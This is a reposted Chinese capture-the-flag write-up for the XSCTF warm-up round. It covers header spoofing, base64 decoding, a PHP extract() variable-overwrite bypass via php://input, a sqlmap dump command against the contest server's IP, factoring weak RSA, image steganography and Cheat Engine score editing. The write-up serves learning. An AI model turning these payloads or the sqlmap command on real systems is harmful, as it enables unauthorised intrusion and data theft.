我的编程空间,编程开发者的网络收藏夹
学习永远不晚

XSCTF联合招新赛-热身赛(部分WP)

短信预约 -IT技能 免费直播动态提醒
省份

北京

  • 北京
  • 上海
  • 天津
  • 重庆
  • 河北
  • 山东
  • 辽宁
  • 黑龙江
  • 吉林
  • 甘肃
  • 青海
  • 河南
  • 江苏
  • 湖北
  • 湖南
  • 江西
  • 浙江
  • 广东
  • 云南
  • 福建
  • 海南
  • 山西
  • 四川
  • 陕西
  • 贵州
  • 安徽
  • 广西
  • 内蒙
  • 西藏
  • 新疆
  • 宁夏
  • 兵团
手机号立即预约

请填写图片验证码后获取短信验证码

看不清楚,换张图片

免费获取短信验证码

XSCTF联合招新赛-热身赛(部分WP)

由于没有多少时间答题,抽空在划水的时候做了一两道题目.比赛已经结束了24小时了。特把写的WP分享一下,欢迎各位大佬进行指点。

文章目录

warm_up

只有虔诚的嘉心糖才能成功拿到flag地址:43.248.98.206:10003
GET / HTTP/1.1Host: 43.248.98.206:10003Pragma: no-cacheCache-Control: no-cacheUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/102.0.0.0 Safari/537.36Referer:jiaran BiliBiliX-Forwarded-For:127.0.0.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Accept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.9,en;q=0.8Connection: close
hsctf{he1_hei_ran_r@n_w0_d3_rAn_Ran_00000000} 

在这里插入图片描述

头头是道

有一个清醒的头脑很重要地址:43.248.98.206:10006
hsctf{Mast3rH0ssssT_dI@nQQ}

在这里插入图片描述

B45364

WVVoT2FtUkhXamRoUmxVeFRtcHNUMXBHT1V4aFYyeDVXVmRHUTJKSGVGTlpXREJMQ2c9PQo=

三次base64得到flag

hsctf{hU569Nd_KiiraaBllRa}

EZphp

我得想想怎么才能取而代之地址:43.248.98.206:10005

打开页面发现php extract变量覆盖

 <?phpinclude 'flag.php';extract($_GET);if (isset($wsf)) {    $xmm = trim(file_get_contents($zm));    if ($xmm == $wsf) {  //通过传参?wsf=&zm= 绕过        if (!empty($xlq)) {            $xw = trim(file_get_contents($fn));             if ($xlq === $xw) {//通过php://input协议绕过                echo "

$flag

"
; } else { echo '

no no no

'
; } } else 'You cant do that!!'; } else { echo 'hacker!!'; }} else { highlight_file(__FILE__);}?>
payload: ?wsf=&zm=&xlq=fn=2&fn=php://input Post传参:fn=2

在这里插入图片描述

flag{phP_lS_th9_be5T_l4ngUa9e}

easy_sql

嘉然,为了你我要打ctf!!!咦?这里这么注入不进去呢?奇怪地址:43.248.98.206:10001

访问之后查看加载发现 id=1
在这里插入图片描述

简单测试,发现sql注入
在这里插入图片描述

sqlmap一把梭哈。

#因为是时间盲注,所以flag出来之后就直接Ctrl+c了python sqlmap.py -u "http://43.248.98.206:10001/image.php?id=*" -D hsctffinal -T users --dump

在这里插入图片描述

baigeiRSA

白给了,白给了,真白给!

下载下来之后的脚本内容

import libnumfrom Crypto.Util import numberfrom secret import flagsize = 128e = 65537p = number.getPrime(size)q = number.getPrime(size)n = p*qm = libnum.s2n(flag)c = pow(m, e, n)print('n = %d' % n)print('c = %d' % c)#同时还有一个输出文件n = 88503001447845031603457048661635807319447136634748350130947825183012205093541c = 40876621398366534035989065383910105526025410999058860023908252093679681817257
在已知e,N,c的情况下,其他不管了,直接yafu分解N,得到p,q 如下P39 = 322368694010594584041053487661458382819P39 = 274539690398523616505159415195049044439

在这里插入图片描述

直接脚本,网上脚本,不过原脚本有问题,然后稍作修改,删除了没有用的代码.结果如下

import gmpy2from Crypto.Util.number import long_to_bytese=65537c=40876621398366534035989065383910105526025410999058860023908252093679681817257p = 322368694010594584041053487661458382819q = 274539690398523616505159415195049044439n = p*qphi_n = (p-1)*(q-1)d = gmpy2.invert(e,phi_n)m = pow(c,d,n)print(long_to_bytes(m))

得到flag

HSCTF{@Zh3n_Ba1_G3i!@}

在这里插入图片描述

image1

图片隐写1

下载下来图片,右键属性,在详细信息中发现flag

在这里插入图片描述

image2

图片隐写2

比第一张图要大,猜测图片内插入了其他数据。

在这里插入图片描述
但是内容一样,主题部分无flag。直接查看16进制,疑似被隐藏。搜索flag
在这里插入图片描述

发现flagflag{5eafbba3-f710-4fcc-9045-0b0a8b581ec5}

在这里插入图片描述

image3

之前两个图片占用40k左右.这个图片占用755k.明显不正常

在这里插入图片描述

同时图片存在白边,疑似高度存在问题

在这里插入图片描述

修改高度后获取flag

flag{2c44e767-e9b4-4b55-b75e-3504b515942f}

在这里插入图片描述
在这里插入图片描述

image4

大小无异常,但是在16进制中搜索flag发现了第二题的flag,提交失败,在最后发现了zip的内容。存在flag.txt
在这里插入图片描述

直接修改后缀为zip,然后打开,获取flag.txt内容

flag{3f0283e0-e5d0-4084-816b-1237718a8630}

在这里插入图片描述

2^11

^在sage里又是什么意思呢……?

下载附件后,运行exe,发现是2048

在这里插入图片描述

逆向不太会,ida分析半天,伪代码调不出来,于是决定上下科技。

通过CE修改分数,直接显示flag
在这里插入图片描述

flag{E1d3sTBrOth3r_CaR0Ilikoule}

在这里插入图片描述

来源地址:https://blog.csdn.net/qq_30817059/article/details/127467679

免责声明:

① 本站未注明“稿件来源”的信息均来自网络整理。其文字、图片和音视频稿件的所属权归原作者所有。本站收集整理出于非商业性的教育和科研之目的,并不意味着本站赞同其观点或证实其内容的真实性。仅作为临时的测试数据,供内部测试之用。本站并未授权任何人以任何方式主动获取本站任何信息。

② 本站未注明“稿件来源”的临时测试数据将在测试完成后最终做删除处理。有问题或投稿请发送至: 邮箱/279061341@qq.com QQ/279061341

XSCTF联合招新赛-热身赛(部分WP)

下载Word文档到电脑,方便收藏和打印~

下载Word文档

编程热搜

  • Python 学习之路 - Python
    一、安装Python34Windows在Python官网(https://www.python.org/downloads/)下载安装包并安装。Python的默认安装路径是:C:\Python34配置环境变量:【右键计算机】--》【属性】-
    Python 学习之路 - Python
  • chatgpt的中文全称是什么
    chatgpt的中文全称是生成型预训练变换模型。ChatGPT是什么ChatGPT是美国人工智能研究实验室OpenAI开发的一种全新聊天机器人模型,它能够通过学习和理解人类的语言来进行对话,还能根据聊天的上下文进行互动,并协助人类完成一系列
    chatgpt的中文全称是什么
  • C/C++中extern函数使用详解
  • C/C++可变参数的使用
    可变参数的使用方法远远不止以下几种,不过在C,C++中使用可变参数时要小心,在使用printf()等函数时传入的参数个数一定不能比前面的格式化字符串中的’%’符号个数少,否则会产生访问越界,运气不好的话还会导致程序崩溃
    C/C++可变参数的使用
  • css样式文件该放在哪里
  • php中数组下标必须是连续的吗
  • Python 3 教程
    Python 3 教程 Python 的 3.0 版本,常被称为 Python 3000,或简称 Py3k。相对于 Python 的早期版本,这是一个较大的升级。为了不带入过多的累赘,Python 3.0 在设计的时候没有考虑向下兼容。 Python
    Python 3 教程
  • Python pip包管理
    一、前言    在Python中, 安装第三方模块是通过 setuptools 这个工具完成的。 Python有两个封装了 setuptools的包管理工具: easy_install  和  pip , 目前官方推荐使用 pip。    
    Python pip包管理
  • ubuntu如何重新编译内核
  • 改善Java代码之慎用java动态编译

目录